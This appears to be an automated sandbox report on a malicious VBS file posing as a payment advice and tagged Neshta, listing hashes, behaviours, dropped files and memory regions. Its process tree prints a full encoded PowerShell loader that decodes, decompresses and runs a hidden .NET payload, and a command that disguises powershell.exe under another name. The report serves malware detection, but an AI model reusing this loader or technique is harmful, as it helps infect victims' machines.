Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 09:51

General

  • Target

    PaymentAdvice-1629043.vbs

  • Size

    2.3MB

  • MD5

    9d7aa394cb39af2a434eb3036a35bb47

  • SHA1

    bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f

  • SHA256

    490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea

  • SHA512

    3b2da959a16b915d52ceadb8336fc5478e7d579a38cf59fe34f15744a0017ea9907bf5b62b4670ea123b223a0af7f3e96ab03d132055a1afd8e6983a4f856033

  • SSDEEP

    24576:dGPQzVpL6fvkC6MugzlGbhhkg6XCoCK86uTK6ClN3Br6kXIEHIQCobtMvQ8rAOSP:dGcJXxTqb38jR/4RzGfFVvC

Malware Config

Signatures

  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Neshta family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3356
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs"
        2⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4612
        • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe
          "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Drops startup file
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2236
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Modifies system executable filetype association
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:4416
    • C:\Windows\system32\cmd.exe
      cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" /Y
      1⤵
      • Process spawned unexpected child process
      PID:3204

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

      Filesize

      86KB

      MD5

      a19e4a96ec5d5485b9574701f725b974

      SHA1

      9473682ece20859be37bd4e4217f47596fe305d7

      SHA256

      29d948687548a1374710fd24591ea81a5e3bcddf52b2a121c9627704f2f98e97

      SHA512

      73aabc378bd230e5383587ccbf9d1bb4d1e25f9880097d6204e8de5b4457e903ea5351bf10dddaa14c4650a4d91172495d8f5f06e63473f8bc43d1442db286e3

    • C:\Users\Admin\AppData\Local\Temp\3582-490\InstallUtil.exe

      Filesize

      40KB

      MD5

      7fe6fb5408992330ada9cd81be35c33b

      SHA1

      2f732ea754fa43dea05fdad5c821f008a92935e2

      SHA256

      8b53f3559183d6206e2573a0c3813141cad7621ee93a5241c622cf7c664d9aee

      SHA512

      630cd455c5c4367e7d4a423d78b69e8f8ca02aa16b2af65d7357420511a692b233c04dc5d8aaafe3eb477b57a37a3ed0ee5b807a66c6fbaa223ac0abd22176ec

    • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe

      Filesize

      423KB

      MD5

      c32ca4acfcc635ec1ea6ed8a34df5fac

      SHA1

      f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

      SHA256

      73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

      SHA512

      6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arqa3a5x.t4i.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2236-4-0x000000007451E000-0x000000007451F000-memory.dmp

      Filesize

      4KB

    • memory/2236-5-0x0000000003300000-0x0000000003336000-memory.dmp

      Filesize

      216KB

    • memory/2236-6-0x0000000074510000-0x0000000074CC0000-memory.dmp

      Filesize

      7.7MB

    • memory/2236-7-0x0000000005B30000-0x0000000006158000-memory.dmp

      Filesize

      6.2MB

    • memory/2236-8-0x0000000074510000-0x0000000074CC0000-memory.dmp

      Filesize

      7.7MB

    • memory/2236-9-0x0000000005910000-0x0000000005932000-memory.dmp

      Filesize

      136KB

    • memory/2236-10-0x00000000059B0000-0x0000000005A16000-memory.dmp

      Filesize

      408KB

    • memory/2236-11-0x0000000005A90000-0x0000000005AF6000-memory.dmp

      Filesize

      408KB

    • memory/2236-21-0x00000000061E0000-0x0000000006534000-memory.dmp

      Filesize

      3.3MB

    • memory/2236-22-0x00000000068E0000-0x00000000068FE000-memory.dmp

      Filesize

      120KB

    • memory/2236-23-0x0000000006930000-0x000000000697C000-memory.dmp

      Filesize

      304KB

    • memory/2236-24-0x0000000007960000-0x00000000079F6000-memory.dmp

      Filesize

      600KB

    • memory/2236-26-0x0000000006E50000-0x0000000006E72000-memory.dmp

      Filesize

      136KB

    • memory/2236-25-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

      Filesize

      104KB

    • memory/2236-27-0x0000000008040000-0x00000000085E4000-memory.dmp

      Filesize

      5.6MB

    • memory/2236-28-0x0000000008C70000-0x00000000092EA000-memory.dmp

      Filesize

      6.5MB

    • memory/2236-29-0x0000000007C90000-0x0000000007DE2000-memory.dmp

      Filesize

      1.3MB

    • memory/2236-30-0x0000000007E80000-0x0000000007F12000-memory.dmp

      Filesize

      584KB

    • memory/2236-31-0x0000000007E50000-0x0000000007E5A000-memory.dmp

      Filesize

      40KB

    • memory/2236-32-0x0000000008780000-0x000000000888E000-memory.dmp

      Filesize

      1.1MB

    • memory/2236-42-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-40-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-46-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-94-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-92-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-96-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-90-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-88-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-86-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-84-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-82-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-78-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-76-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-74-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-72-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-70-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-68-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-67-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-60-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-58-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-56-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-54-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-48-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-44-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-80-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-64-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-62-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-52-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-50-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-38-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-36-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-34-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-33-0x0000000008780000-0x0000000008888000-memory.dmp

      Filesize

      1.0MB

    • memory/2236-1210-0x0000000008910000-0x000000000895C000-memory.dmp

      Filesize

      304KB

    • memory/2236-1209-0x0000000008890000-0x000000000890E000-memory.dmp

      Filesize

      504KB

    • memory/2236-1211-0x0000000008960000-0x00000000089B4000-memory.dmp

      Filesize

      336KB

    • memory/2236-1221-0x0000000074510000-0x0000000074CC0000-memory.dmp

      Filesize

      7.7MB